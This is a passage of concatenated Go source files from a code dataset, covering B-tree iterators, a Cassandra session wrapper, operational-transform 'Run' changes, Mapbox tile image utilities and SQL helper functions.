	 * Performs a sequential evaluation of the operation on the elements
	 * produced by the given spliterator.
	 *
	 * @param ctx the context governing the evaluation
	 * @param spliterator the source spliterator
	 * @return the result of the evaluation
	 */
	EvaluateSequential(ctx context.Context, spliterator spliterator.Spliterator) optional.Optional
}
// TODOOperation is a base implementation of Operation: it reports no
// operation flags and delegates parallel evaluation to the sequential path.
type TODOOperation struct {
	class.Class
}
// GetOpFlags returns zero, i.e. no operation flags are set.
func (op *TODOOperation) GetOpFlags() int {
	return 0
}
// EvaluateParallel falls back to a sequential evaluation, dispatched on the
// value returned by GetDerivedElse(op) so that an overriding derived type's
// EvaluateSequential is used.
func (op *TODOOperation) EvaluateParallel(ctx context.Context, spliterator spliterator.Spliterator) optional.Optional {
	c := op.GetDerivedElse(op).(Operation)
	return c.EvaluateSequential(ctx, spliterator)
}
// EvaluateSequential must be provided by derived operations; the base
// implementation panics with an illegal-state exception.
func (op *TODOOperation) EvaluateSequential(ctx context.Context, spliterator spliterator.Spliterator) optional.Optional {
	panic(exception.NewIllegalStateException())
} | go/container/stream/op/terminal/op.go | 0.860677 | 0.431704 | op.go | starcoder |
package btree
import "github.com/xtmono/gods/containers"
// assertIteratorImplementation is a compile-time check that *Iterator
// satisfies containers.ReverseIteratorWithKey.
func assertIteratorImplementation() {
	var _ containers.ReverseIteratorWithKey = (*Iterator)(nil)
}
// Iterator holding the iterator's state
type Iterator struct {
	tree *Tree // the tree being iterated
	node *Node // node containing the current entry; nil at begin/end
	entry *Entry // current key/value entry; nil at begin/end
	position position // begin, between or end
}
// position tracks whether the iterator is before the first element (begin),
// on an element (between), or past the last element (end).
type position byte
const (
	begin, between, end position = 0, 1, 2
)
// Iterator returns a stateful iterator whose elements are key/value pairs.
// The iterator starts before the first element; call Next to advance.
func (tree *Tree) Iterator() Iterator {
	return Iterator{tree: tree, node: nil, position: begin}
}
// Next moves the iterator to the next element and returns true if there was a next element in the container.
// If Next() returns true, then next element's key and value can be retrieved by Key() and Value().
// If Next() was called for the first time, then it will point the iterator to the first element if it exists.
// Modifies the state of the iterator.
// Implementation note: all exits funnel through the shared end/between
// labels, which keep position/node/entry consistent.
func (iterator *Iterator) Next() bool {
	// If already at end, go to end
	if iterator.position == end {
		goto end
	}
	// If at beginning, get the left-most entry in the tree
	if iterator.position == begin {
		left := iterator.tree.Left()
		if left == nil {
			goto end
		}
		iterator.node = left
		iterator.entry = left.Entries[0]
		goto between
	}
	{
		// Find current entry position in current node
		e, _ := iterator.tree.search(iterator.node, iterator.entry.Key)
		// Try to go down to the child right of the current entry
		if e+1 < len(iterator.node.Children) {
			iterator.node = iterator.node.Children[e+1]
			// Try to go down to the child left of the current node
			for len(iterator.node.Children) > 0 {
				iterator.node = iterator.node.Children[0]
			}
			// Return the left-most entry
			iterator.entry = iterator.node.Entries[0]
			goto between
		}
		// Above assures that we have reached a leaf node, so return the next entry in current node (if any)
		if e+1 < len(iterator.node.Entries) {
			iterator.entry = iterator.node.Entries[e+1]
			goto between
		}
	}
	// Reached leaf node and there are no entries to the right of the current entry, so go up to the parent
	for iterator.node.Parent != nil {
		iterator.node = iterator.node.Parent
		// Find next entry position in current node (note: search returns the first equal or bigger than entry)
		e, _ := iterator.tree.search(iterator.node, iterator.entry.Key)
		// Check that there is a next entry position in current node
		if e < len(iterator.node.Entries) {
			iterator.entry = iterator.node.Entries[e]
			goto between
		}
	}
end:
	iterator.End()
	return false
between:
	iterator.position = between
	return true
}
// Prev moves the iterator to the previous element and returns true if there was a previous element in the container.
// If Prev() returns true, then previous element's key and value can be retrieved by Key() and Value().
// Modifies the state of the iterator.
// Implementation note: mirror image of Next; all exits funnel through the
// shared begin/between labels.
func (iterator *Iterator) Prev() bool {
	// If already at beginning, go to begin
	if iterator.position == begin {
		goto begin
	}
	// If at end, get the right-most entry in the tree
	if iterator.position == end {
		right := iterator.tree.Right()
		if right == nil {
			goto begin
		}
		iterator.node = right
		iterator.entry = right.Entries[len(right.Entries)-1]
		goto between
	}
	{
		// Find current entry position in current node
		e, _ := iterator.tree.search(iterator.node, iterator.entry.Key)
		// Try to go down to the child left of the current entry
		if e < len(iterator.node.Children) {
			iterator.node = iterator.node.Children[e]
			// Try to go down to the child right of the current node
			for len(iterator.node.Children) > 0 {
				iterator.node = iterator.node.Children[len(iterator.node.Children)-1]
			}
			// Return the right-most entry
			iterator.entry = iterator.node.Entries[len(iterator.node.Entries)-1]
			goto between
		}
		// Above assures that we have reached a leaf node, so return the previous entry in current node (if any)
		if e-1 >= 0 {
			iterator.entry = iterator.node.Entries[e-1]
			goto between
		}
	}
	// Reached leaf node and there are no entries to the left of the current entry, so go up to the parent
	for iterator.node.Parent != nil {
		iterator.node = iterator.node.Parent
		// Find previous entry position in current node (note: search returns the first equal or bigger than entry)
		e, _ := iterator.tree.search(iterator.node, iterator.entry.Key)
		// Check that there is a previous entry position in current node
		if e-1 >= 0 {
			iterator.entry = iterator.node.Entries[e-1]
			goto between
		}
	}
begin:
	iterator.Begin()
	return false
between:
	iterator.position = between
	return true
}
// Value returns the current element's value.
// Does not modify the state of the iterator.
// NOTE: entry is nil at begin/end, so calling this when the iterator is not
// positioned on an element panics with a nil dereference.
func (iterator *Iterator) Value() interface{} {
	return iterator.entry.Value
}
// Key returns the current element's key.
// Does not modify the state of the iterator.
// NOTE: entry is nil at begin/end, so calling this when the iterator is not
// positioned on an element panics with a nil dereference.
func (iterator *Iterator) Key() interface{} {
	return iterator.entry.Key
}
// Begin resets the iterator to its initial state (one-before-first)
// Call Next() to fetch the first element if any.
func (iterator *Iterator) Begin() {
	iterator.node = nil
	iterator.position = begin
	iterator.entry = nil
}
// End moves the iterator past the last element (one-past-the-end).
// Call Prev() to fetch the last element if any.
func (iterator *Iterator) End() {
	iterator.node = nil
	iterator.position = end
	iterator.entry = nil
}
// First moves the iterator to the first element and returns true if there was a first element in the container.
// If First() returns true, then first element's key and value can be retrieved by Key() and Value().
// Modifies the state of the iterator
func (iterator *Iterator) First() bool {
	iterator.Begin()
	return iterator.Next()
}
// Last moves the iterator to the last element and returns true if there was a last element in the container.
// If Last() returns true, then last element's key and value can be retrieved by Key() and Value().
// Modifies the state of the iterator.
func (iterator *Iterator) Last() bool {
	iterator.End()
	return iterator.Prev()
}
} | trees/btree/iterator.go | 0.755096 | 0.431045 | iterator.go | starcoder |
package validation
import (
validation "github.com/Randyshu2018/fabric/core/handlers/validation/api"
)
// State defines interaction with the world state
type State interface {
	// GetStateMultipleKeys gets the values for multiple keys in a single call
	GetStateMultipleKeys(namespace string, keys []string) ([][]byte, error)
	// GetStateRangeScanIterator returns an iterator that contains all the key-values between given key ranges.
	// startKey is included in the results and endKey is excluded. An empty startKey refers to the first available key
	// and an empty endKey refers to the last available key. For scanning all the keys, both the startKey and the endKey
	// can be supplied as empty strings. However, a full scan should be used judiciously for performance reasons.
	// The returned ResultsIterator contains results of type *KV which is defined in fabric-protos/ledger/queryresult.
	GetStateRangeScanIterator(namespace string, startKey string, endKey string) (ResultsIterator, error)
	// GetStateMetadata returns the metadata for given namespace and key
	GetStateMetadata(namespace, key string) (map[string][]byte, error)
	// GetPrivateDataMetadataByHash gets the metadata of a private data item identified by a tuple <namespace, collection, keyhash>
	GetPrivateDataMetadataByHash(namespace, collection string, keyhash []byte) (map[string][]byte, error)
	// Done releases resources occupied by the State
	Done()
}
// StateFetcher retrieves an instance of a state
type StateFetcher interface {
	validation.Dependency
	// FetchState fetches state; callers should release the returned State
	// with Done() when finished with it
	FetchState() (State, error)
}
// ResultsIterator - an iterator for query result set
type ResultsIterator interface {
	// Next returns the next item in the result set. The `QueryResult` is expected to be nil when
	// the iterator gets exhausted
	Next() (QueryResult, error)
	// Close releases resources occupied by the iterator
	Close()
}
// QueryResult - a general interface for supporting different types of query results. Actual types differ for different queries
type QueryResult interface{} | core/handlers/validation/api/state/state.go | 0.594787 | 0.521837 | state.go | starcoder |
// Package run implements a custom change that applies to a sequence
// of array elements.
package run
import (
"github.com/dotchain/dot/changes"
"github.com/dotchain/dot/refs"
)
// Run implements a custom change type which applies a provided
// inner change to a run of items in an array. This is particularly
// useful for rich text operations
type Run struct {
	Offset, Count int // the half-open index range [Offset, Offset+Count) the inner change applies to
	changes.Change // the inner change applied to every item in the range
}
// ApplyTo just converts the method into a set of path changes
// (one PathChange per index in [Offset, Offset+Count)).
func (r Run) ApplyTo(ctx changes.Context, v changes.Value) changes.Value {
	for kk := r.Offset; kk < r.Offset+r.Count; kk++ {
		v = v.Apply(ctx, changes.PathChange{Path: []interface{}{kk}, Change: r.Change})
	}
	return v
}
// Revert undoes the effect of the Run
func (r Run) Revert() changes.Change {
	// A nil inner change is a no-op; its revert is also nil.
	if r.Change == nil {
		return nil
	}
	// Reverting the inner change over the same range undoes the run.
	return Run{r.Offset, r.Count, r.Change.Revert()}
}
// Merge implements the main merge routing for a change
func (r Run) Merge(o changes.Change) (changes.Change, changes.Change) {
	return r.merge(o, false)
}
// ReverseMerge is like Merge except the args and receiver are
// inverted. Basically if someone calls "ch.Merge(r)" and ch does not
// know how to implement merge with r, it calls r.ReverseMerge(ch).
func (r Run) ReverseMerge(o changes.Change) (changes.Change, changes.Change) {
	return r.merge(o, true)
}
// MergePath implements the method needed to work with refs.Merge
func (r Run) MergePath(p []interface{}) *refs.MergeResult {
	idx := p[0].(int)
	// Indices outside [Offset, Offset+Count) are unaffected by the run.
	if idx < r.Offset || idx >= r.Offset+r.Count {
		return &refs.MergeResult{P: p, Unaffected: r}
	}
	// The index is inside the run: merge the rest of the path against the
	// inner change and re-prefix with the index.
	return refs.Merge(p[1:], r.Change).Prefix(p[:1])
}
// merge dispatches on the concrete type of o to the type-specific merge
// helpers. When reverse is true, the merge priority of the two changes is
// swapped (used to implement ReverseMerge).
func (r Run) merge(o changes.Change, reverse bool) (ox, rx changes.Change) {
	// A nil inner change makes the run a no-op.
	if r.Change == nil {
		return o, nil
	}
	switch o := o.(type) {
	case nil:
		return nil, r
	case changes.Replace:
		// A replace subsumes the run: fold the run into the replaced "before"
		// value and drop the run.
		o.Before = o.Before.Apply(nil, r)
		return o, nil
	case changes.Splice:
		return r.mergeSplice(o)
	case changes.Move:
		return r.mergeMove(o)
	case Run:
		return r.mergeRun(o, reverse)
	case changes.PathChange:
		return r.mergePathChange(o, reverse)
	}
	// Unknown change type: delegate to the other change's merge machinery.
	if reverse {
		rx, ox = o.Merge(r)
	} else {
		rx, ox = o.(changes.Custom).ReverseMerge(r)
	}
	return ox, rx
}
// mergeSplice merges the run with a splice over the same array, case by
// case on how the run's range relates to the spliced region.
func (r Run) mergeSplice(o changes.Splice) (changes.Change, changes.Change) {
	oEnd := o.Offset + o.Before.Count()
	switch {
	case r.Offset >= oEnd:
		// Run lies entirely after the spliced region: shift by the size delta.
		r.Offset += o.After.Count() - o.Before.Count()
	case r.Offset+r.Count <= o.Offset:
		// Run lies entirely before the spliced region: unaffected.
	case r.Offset >= o.Offset && r.Offset+r.Count <= oEnd:
		// Run falls fully inside the spliced-out region: fold it into
		// o.Before (rebased relative to the splice) and drop the run.
		r.Offset -= o.Offset
		o.Before = r.apply(nil, o.Before, r)
		return o, nil
	case r.Offset <= o.Offset && r.Offset+r.Count >= oEnd:
		// Run covers the whole spliced region: apply it to all of o.Before
		// and keep the left/right leftovers around the inserted material.
		o.Before = r.apply(nil, o.Before, Run{0, o.Before.Count(), r.Change})
		left := Run{r.Offset, o.Offset - r.Offset, r.Change}
		right := Run{o.Offset + o.After.Count(), r.Offset + r.Count - oEnd, r.Change}
		return o, changes.ChangeSet{left, right}
	case r.Offset < o.Offset && o.Offset < r.Offset+r.Count:
		// Run overlaps the left edge of the splice: fold the overlapped part
		// into o.Before and truncate the run to the part before the splice.
		o.Before = r.apply(nil, o.Before, Run{0, r.Offset + r.Count - o.Offset, r.Change})
		r.Count = o.Offset - r.Offset
	case r.Offset > o.Offset && r.Offset < oEnd:
		// Run overlaps the right edge of the splice: fold the overlapped part
		// into o.Before and keep the tail, shifted past the inserted material.
		o.Before = r.apply(nil, o.Before, Run{r.Offset - o.Offset, oEnd - r.Offset, r.Change})
		r.Count = r.Offset + r.Count - oEnd
		r.Offset = o.Offset + o.After.Count()
	}
	return o, r
}
// apply applies change c to v and asserts the result back to a collection.
func (r Run) apply(ctx changes.Context, v changes.Value, c changes.Change) changes.Collection {
	return v.Apply(ctx, c).(changes.Collection)
}
// mergeMove merges the run with a move of [o.Offset, o.Offset+o.Count) by
// o.Distance, adjusting the run's offset case by case. oDest is the index
// the moved block lands at (right end for positive distance, left end for
// negative distance).
func (r Run) mergeMove(o changes.Move) (changes.Change, changes.Change) {
	rEnd, oEnd := r.Offset+r.Count, o.Offset+o.Count
	oDest := oEnd + o.Distance
	if o.Distance < 0 {
		oDest = o.Offset + o.Distance
	}
	switch {
	case rEnd <= o.Offset && rEnd <= oDest:
		// Run ends before both the moved block and its destination: unaffected.
	case r.Offset >= oDest && rEnd <= o.Offset:
		// Run sits between the destination and the moved block: the block is
		// inserted before it, shifting it right.
		r.Offset += o.Count
	case r.Offset >= o.Offset && rEnd <= oEnd:
		// Run falls inside the moved block: it travels with it.
		r.Offset += o.Distance
	case r.Offset >= oEnd && rEnd <= oDest:
		// Run sits between the moved block and its destination: the block is
		// removed from before it, shifting it left.
		r.Offset -= o.Count
	case r.Offset >= oEnd && rEnd >= oDest:
		// Run starts after the moved block and extends to or past the
		// destination: its positions are unchanged.
	default:
		// Run straddles a boundary: split it at the move boundaries and merge
		// the pieces individually.
		return r.split3(oDest, o)
	}
	return o, r
}
// mergeRun merges two runs over the same array. Disjoint runs pass through
// unchanged, identical extents merge their inner changes directly, and
// partial overlaps are split into aligned sub-runs before merging.
func (r Run) mergeRun(o Run, reverse bool) (changes.Change, changes.Change) {
	rEnd, oEnd := r.Offset+r.Count, o.Offset+o.Count
	switch {
	case rEnd <= o.Offset || oEnd <= r.Offset:
		// Disjoint runs do not interact.
		return o, r
	case r.Offset == o.Offset && rEnd == oEnd:
		// Identical extents: merge the inner changes directly.
		var ox, rx changes.Change
		if reverse && o.Change != nil {
			rx, ox = o.Change.Merge(r.Change)
		} else {
			ox, rx = r.Change.Merge(o.Change)
		}
		return Run{o.Offset, o.Count, ox}, Run{r.Offset, r.Count, rx}
	}
	// Partial overlap: split each run at the other's boundaries so the
	// pieces align, then merge the two aligned change sets.
	left := r.splitRuns([]changes.Change{r}, o.Offset)
	left = r.splitRuns(left, o.Offset+o.Count)
	right := r.splitRuns([]changes.Change{o}, r.Offset)
	right = r.splitRuns(right, r.Offset+r.Count)
	lx := changes.ChangeSet(left)
	rx := changes.ChangeSet(right)
	if reverse {
		x, y := rx.Merge(lx)
		return y, x
	}
	return lx.Merge(rx)
}
// mergePathChange merges the run with a change targeted at a path. A path
// whose first element falls inside the run splits the run into the parts
// before and after that index, with the targeted index merged against the
// inner change.
func (r Run) mergePathChange(o changes.PathChange, reverse bool) (changes.Change, changes.Change) {
	if len(o.Path) == 0 {
		// Empty path: merge against the wrapped change directly.
		return r.merge(o.Change, reverse)
	}
	idx := o.Path[0].(int)
	if idx < r.Offset || idx >= r.Offset+r.Count {
		// The path targets an index outside the run: no interaction.
		return o, r
	}
	// Split off the parts of the run strictly before and after idx.
	var left, right changes.Change
	if idx > r.Offset {
		left = Run{r.Offset, idx - r.Offset, r.Change}
	}
	if idx+1 < r.Offset+r.Count {
		right = Run{idx + 1, r.Offset + r.Count - idx - 1, r.Change}
	}
	// Merge the inner change with the remainder of the path at idx.
	other := changes.PathChange{Path: o.Path[1:], Change: o.Change}
	var ox, mid changes.Change
	if reverse {
		mid, ox = other.Merge(r.Change)
	} else {
		ox, mid = r.Change.Merge(other)
	}
	ox = changes.PathChange{Path: o.Path[:1], Change: ox}
	mid = changes.PathChange{Path: o.Path[:1], Change: mid}
	return ox, changes.ChangeSet{left, mid, right}
}
// splitRuns splits any run in runs that straddles index idx into two
// adjacent runs meeting at idx; runs not containing idx pass through
// unchanged.
func (r Run) splitRuns(runs []changes.Change, idx int) []changes.Change {
	result := make([]changes.Change, 0, len(runs)+1)
	for _, rx := range runs {
		run := rx.(Run)
		if idx > run.Offset && idx < run.Offset+run.Count {
			left := Run{run.Offset, idx - run.Offset, run.Change}
			right := Run{idx, run.Count + run.Offset - idx, run.Change}
			result = append(result, left, right)
		} else {
			result = append(result, run)
		}
	}
	return result
}
// split3 splits r at the move destination and at both boundaries of the
// moved block, then merges the resulting pieces with the move.
func (r Run) split3(dest int, o changes.Move) (changes.Change, changes.Change) {
	c := r.splitRuns([]changes.Change{r}, dest)
	c = r.splitRuns(c, o.Offset)
	c = r.splitRuns(c, o.Offset+o.Count)
	return changes.ChangeSet(c).Merge(o)
} | changes/run/run.go | 0.794505 | 0.490724 | run.go | starcoder |
package peplos
import (
"fmt"
"github.com/gocql/gocql"
"github.com/maraino/go-mock"
)
// metadata returns the gocql metadata for keyspace, treating an
// all-zero-value result (apart from the echoed name) as an invalid
// keyspace.
func metadata(s *gocql.Session, keyspace string) (*gocql.KeyspaceMetadata, error) {
	var m, err = s.KeyspaceMetadata(keyspace)
	if err != nil {
		return nil, err
	}
	// NOTE(review): this zero-value heuristic assumes gocql returns an empty
	// KeyspaceMetadata rather than an error for a missing keyspace — confirm
	// against the gocql version in use.
	if !m.DurableWrites && m.Name == keyspace && m.StrategyClass == "" && len(m.StrategyOptions) == 0 && len(m.Tables) == 0 {
		return nil, fmt.Errorf("gockle: keyspace %v invalid", keyspace)
	}
	return m, nil
}
// Session is a Cassandra connection. The Query methods run CQL queries. The
// Columns and Tables methods provide simple metadata. The implementations
// in this package are session (real) and SessionMock (for tests).
type Session interface {
	// Batch returns a new Batch for the Session.
	Batch(kind BatchKind) Batch
	// Close closes the Session.
	Close()
	// Columns returns a map from column names to types for keyspace and table.
	// Schema changes during a session are not reflected; you must open a new
	// Session to observe them.
	Columns(keyspace, table string) (map[string]gocql.TypeInfo, error)
	// Exec executes the query for statement and arguments.
	Exec(statement string, arguments ...interface{}) error
	// Scan executes the query for statement and arguments and puts the first
	// result row in results.
	Scan(statement string, results []interface{}, arguments ...interface{}) error
	// ScanIterator executes the query for statement and arguments and returns an
	// Iterator for the results.
	ScanIterator(statement string, arguments ...interface{}) Iterator
	// ScanMap executes the query for statement and arguments and puts the first
	// result row in results.
	ScanMap(statement string, results map[string]interface{}, arguments ...interface{}) error
	// ScanMapSlice executes the query for statement and arguments and returns all
	// the result rows.
	ScanMapSlice(statement string, arguments ...interface{}) ([]map[string]interface{}, error)
	// ScanMapTx executes the query for statement and arguments as a lightweight
	// transaction. If the query is not applied, it puts the current values for the
	// conditional columns in results. It returns whether the query is applied.
	ScanMapTx(statement string, results map[string]interface{}, arguments ...interface{}) (bool, error)
	// Tables returns the table names for keyspace. Schema changes during a session
	// are not reflected; you must open a new Session to observe them.
	Tables(keyspace string) ([]string, error)
}
var (
_ Session = SessionMock{}
_ Session = session{}
)
// NewSession returns a new Session for s.
// The wrapped gocql session's lifetime is managed by the caller via Close.
func NewSession(s *gocql.Session) Session {
	return session{s: s}
}
// NewSimpleSession returns a new Session for hosts. It uses native protocol
// version 4.
func NewSimpleSession(hosts ...string) (Session, error) {
	cluster := gocql.NewCluster(hosts...)
	cluster.ProtoVersion = 4
	underlying, err := cluster.CreateSession()
	if err != nil {
		return nil, err
	}
	return session{s: underlying}, nil
}
// SessionMock is a mock Session. See github.com/maraino/go-mock.
//
// Each method records its arguments through mock.Mock.Called and returns
// whatever values the test has configured.
type SessionMock struct {
	mock.Mock
}

// Batch implements Session.
func (m SessionMock) Batch(kind BatchKind) Batch {
	return m.Called(kind).Get(0).(Batch)
}

// Close implements Session.
func (m SessionMock) Close() {
	m.Called()
}

// Columns implements Session.
func (m SessionMock) Columns(keyspace, table string) (map[string]gocql.TypeInfo, error) {
	var r = m.Called(keyspace, table)
	return r.Get(0).(map[string]gocql.TypeInfo), r.Error(1)
}

// Exec implements Session.
func (m SessionMock) Exec(statement string, arguments ...interface{}) error {
	return m.Called(statement, arguments).Error(0)
}

// Scan implements Session.
func (m SessionMock) Scan(statement string, results []interface{}, arguments ...interface{}) error {
	return m.Called(statement, results, arguments).Error(0)
}

// ScanIterator implements Session.
func (m SessionMock) ScanIterator(statement string, arguments ...interface{}) Iterator {
	return m.Called(statement, arguments).Get(0).(Iterator)
}

// ScanMap implements Session.
func (m SessionMock) ScanMap(statement string, results map[string]interface{}, arguments ...interface{}) error {
	return m.Called(statement, results, arguments).Error(0)
}

// ScanMapSlice implements Session.
func (m SessionMock) ScanMapSlice(statement string, arguments ...interface{}) ([]map[string]interface{}, error) {
	var r = m.Called(statement, arguments)
	return r.Get(0).([]map[string]interface{}), r.Error(1)
}

// ScanMapTx implements Session.
func (m SessionMock) ScanMapTx(statement string, results map[string]interface{}, arguments ...interface{}) (bool, error) {
	var r = m.Called(statement, results, arguments)
	return r.Bool(0), r.Error(1)
}

// Tables implements Session.
func (m SessionMock) Tables(keyspace string) ([]string, error) {
	var r = m.Called(keyspace)
	return r.Get(0).([]string), r.Error(1)
}
// session is the production Session implementation wrapping a *gocql.Session.
type session struct {
	s *gocql.Session
}

// Batch implements Session by wrapping a new gocql batch of the given kind.
func (s session) Batch(kind BatchKind) Batch {
	return batch{b: s.s.NewBatch(gocql.BatchType(kind)), s: s.s}
}

// Close implements Session.
func (s session) Close() {
	s.s.Close()
}

// Columns implements Session. It validates the keyspace via metadata and
// returns an error when the table does not exist in it.
func (s session) Columns(keyspace, table string) (map[string]gocql.TypeInfo, error) {
	var m, err = metadata(s.s, keyspace)
	if err != nil {
		return nil, err
	}
	var t, ok = m.Tables[table]
	if !ok {
		return nil, fmt.Errorf("gockle: table %v.%v invalid", keyspace, table)
	}
	var types = map[string]gocql.TypeInfo{}
	for n, c := range t.Columns {
		types[n] = c.Type
	}
	return types, nil
}

// Exec implements Session.
func (s session) Exec(statement string, arguments ...interface{}) error {
	return s.s.Query(statement, arguments...).Exec()
}

// Scan implements Session; results receives the first row's column values.
func (s session) Scan(statement string, results []interface{}, arguments ...interface{}) error {
	return s.s.Query(statement, arguments...).Scan(results...)
}

// ScanIterator implements Session.
func (s session) ScanIterator(statement string, arguments ...interface{}) Iterator {
	return iterator{i: s.s.Query(statement, arguments...).Iter()}
}

// ScanMap implements Session.
func (s session) ScanMap(statement string, results map[string]interface{}, arguments ...interface{}) error {
	return s.s.Query(statement, arguments...).MapScan(results)
}

// ScanMapSlice implements Session.
func (s session) ScanMapSlice(statement string, arguments ...interface{}) ([]map[string]interface{}, error) {
	return s.s.Query(statement, arguments...).Iter().SliceMap()
}

// ScanMapTx implements Session; the bool reports whether the lightweight
// transaction was applied.
func (s session) ScanMapTx(statement string, results map[string]interface{}, arguments ...interface{}) (bool, error) {
	return s.s.Query(statement, arguments...).MapScanCAS(results)
}
func (s session) Tables(keyspace string) ([]string, error) {
var m, err = metadata(s.s, keyspace)
if err != nil {
return nil, err
}
var ts []string
for t := range m.Tables {
ts = append(ts, t)
}
return ts, nil
} | session.go | 0.732687 | 0.403273 | session.go | starcoder |
package maps
import (
"bufio"
"bytes"
"image"
"image/draw"
"image/jpeg"
"image/png"
"io/ioutil"
"os"
"github.com/JayBusch/go-mapbox/lib/base"
)
// LocationToTileID converts a lat/lon location into a tile ID
// at the given zoom level, assuming 256-pixel Web Mercator tiles.
func LocationToTileID(loc base.Location, level uint64) (uint64, uint64) {
	return MercatorLocationToTileID(loc.Latitude, loc.Longitude, level, 256)
}

// TileIDToLocation converts a tile ID to a lat/lon location
// (256-pixel Web Mercator tiles assumed; x and y may be fractional).
func TileIDToLocation(x, y float64, level uint64) base.Location {
	lat, lng := MercatorPixelToLocation(x, y, level, 256)
	return base.Location{
		Latitude:  lat,
		Longitude: lng,
	}
}
// WrapTileID wraps tile IDs by level for api requests
// eg. Tile (X:16, Y:10, level:4 ) will become (X:0, Y:10, level:4)
//
// Zoom level z has 2^z tiles per axis, so coordinates are reduced modulo
// 2^z. The previous implementation computed the modulus as 2<<(level-1),
// which underflows for level 0 (the shift amount wraps around, the modulus
// becomes 0, and the division panics); 1<<level is equivalent for
// level >= 1 and also correct for level 0.
func WrapTileID(x, y, level uint64) (uint64, uint64) {
	n := uint64(1) << level
	return x % n, y % n
}
// GetEnclosingTileIDs fetches a pair of tile IDs enclosing the provided pair of points
// at the given zoom level. It returns (xStart, yStart, xEnd, yEnd) with the
// start coordinates guaranteed to be <= the end coordinates.
func GetEnclosingTileIDs(a, b base.Location, level uint64) (uint64, uint64, uint64, uint64) {
	aX, aY := LocationToTileID(a, level)
	bX, bY := LocationToTileID(b, level)

	xStart, xEnd := aX, bX
	if xStart > xEnd {
		xStart, xEnd = xEnd, xStart
	}
	yStart, yEnd := aY, bY
	if yStart > yEnd {
		yStart, yEnd = yEnd, yStart
	}
	return xStart, yStart, xEnd, yEnd
}
// StitchTiles combines a 2d array of image tiles into a single larger image
// Note that all images must have the same dimensions for this to work
//
// images is indexed [row][column]; the grid must be non-empty (the function
// indexes images[0][0] unconditionally). The stitched tile inherits X, Y,
// Level and Size from images[0][0].
func StitchTiles(images [][]Tile) Tile {
	imgX := images[0][0].Image.Bounds().Dx()
	imgY := images[0][0].Image.Bounds().Dy()

	xSize := imgX * len(images[0])
	ySize := imgY * len(images)

	stitched := image.NewRGBA(image.Rect(0, 0, xSize, ySize))
	for y, row := range images {
		for x, img := range row {
			// Paste each tile at its grid position.
			sp := image.Point{0, 0}
			bounds := image.Rect(x*imgX, y*imgY, (x+1)*imgX, (y+1)*imgY)
			draw.Draw(stitched, bounds, img, sp, draw.Over)
		}
	}

	return NewTile(images[0][0].X, images[0][0].Y, images[0][0].Level, images[0][0].Size, stitched)
}
// LoadImage loads an image from a file.
//
// The file is read fully into memory so it can be decoded twice: once for
// the image configuration (dimensions, color model) and once for the pixel
// data. The previous implementation ignored the error from ReadAll and
// closed the file a second time on the decode-error paths; the file is now
// closed exactly once, immediately after reading.
func LoadImage(file string) (image.Image, *image.Config, error) {
	f, err := os.Open(file)
	if err != nil {
		return nil, nil, err
	}
	data, err := ioutil.ReadAll(bufio.NewReader(f))
	f.Close()
	if err != nil {
		return nil, nil, err
	}

	cfg, _, err := image.DecodeConfig(bytes.NewReader(data))
	if err != nil {
		return nil, nil, err
	}
	img, _, err := image.Decode(bytes.NewReader(data))
	if err != nil {
		return nil, nil, err
	}
	return img, &cfg, nil
}
// SaveImageJPG writes an image instance to a jpg file using the default
// JPEG encoding options.
//
// The previous implementation leaked the file descriptor when encoding or
// flushing failed and silently ignored the error returned by Close; the
// file is now closed on every path and the Close error is surfaced.
func SaveImageJPG(img image.Image, file string) error {
	f, err := os.Create(file)
	if err != nil {
		return err
	}
	w := bufio.NewWriter(f)
	if err := jpeg.Encode(w, img, nil); err != nil {
		f.Close()
		return err
	}
	if err := w.Flush(); err != nil {
		f.Close()
		return err
	}
	return f.Close()
}
// SaveImagePNG writes an image instance to a png file.
//
// The previous implementation leaked the file descriptor when encoding or
// flushing failed and silently ignored the error returned by Close; the
// file is now closed on every path and the Close error is surfaced.
func SaveImagePNG(img image.Image, file string) error {
	f, err := os.Create(file)
	if err != nil {
		return err
	}
	w := bufio.NewWriter(f)
	if err := png.Encode(w, img); err != nil {
		f.Close()
		return err
	}
	if err := w.Flush(); err != nil {
		f.Close()
		return err
	}
	return f.Close()
}
// PixelToHeight Converts a pixel to a height value for mapbox terrain tiles
// Equation from https://www.mapbox.com/blog/terrain-rgb/
//
// The 24-bit RGB value encodes elevation in 0.1 m steps offset by -10000 m.
func PixelToHeight(r, g, b uint8) float64 {
	rgb := float64(r)*256*256 + float64(g)*256 + float64(b)
	return rgb*0.1 + -10000
}
// HeightToPixel encodes a height value (in meters) into terrain-RGB pixel
// channels, inverting PixelToHeight.
//
// The encoded value is a 24-bit count of 0.1 m increments above -10000 m,
// split big-endian across the R, G and B channels. The previous
// implementation reduced each byte with "% 0xFF" (modulo 255) instead of
// masking to 8 bits (modulo 256), which corrupted any channel whose true
// value was 255 and broke the PixelToHeight round trip; the uint8
// conversion below truncates to the low 8 bits correctly.
func HeightToPixel(alt float64) (uint8, uint8, uint8) {
	increments := int((alt + 10000) / 0.1)
	b := uint8(increments >> 0)
	g := uint8(increments >> 8)
	r := uint8(increments >> 16)
	return r, g, b
}
package query
import (
"database/sql"
"fmt"
"strings"
)
// SelectStrings executes a statement which must yield rows with a single string
// column. It returns the list of column values.
func SelectStrings(tx *sql.Tx, query string, args ...any) ([]string, error) {
	values := []string{}
	// Accumulate one string per row.
	scan := func(rows *sql.Rows) error {
		var value string
		err := rows.Scan(&value)
		if err != nil {
			return err
		}
		values = append(values, value)
		return nil
	}

	// "TEXT" names the expected column type (see scanSingleColumn).
	err := scanSingleColumn(tx, query, args, "TEXT", scan)
	if err != nil {
		return nil, err
	}

	return values, nil
}

// SelectIntegers executes a statement which must yield rows with a single integer
// column. It returns the list of column values.
func SelectIntegers(tx *sql.Tx, query string, args ...any) ([]int, error) {
	values := []int{}
	// Accumulate one int per row.
	scan := func(rows *sql.Rows) error {
		var value int
		err := rows.Scan(&value)
		if err != nil {
			return err
		}
		values = append(values, value)
		return nil
	}

	// "INTEGER" names the expected column type (see scanSingleColumn).
	err := scanSingleColumn(tx, query, args, "INTEGER", scan)
	if err != nil {
		return nil, err
	}

	return values, nil
}
// InsertStrings inserts a new row for each of the given strings, using the
// given insert statement template, which must define exactly one insertion
// column and one substitution placeholder for the values. For example:
// InsertStrings(tx, "INSERT INTO foo(name) VALUES %s", []string{"bar"}).
// With no values it is a no-op and the transaction is never touched.
func InsertStrings(tx *sql.Tx, stmt string, values []string) error {
	if len(values) == 0 {
		return nil
	}

	placeholders := make([]string, 0, len(values))
	args := make([]any, 0, len(values))
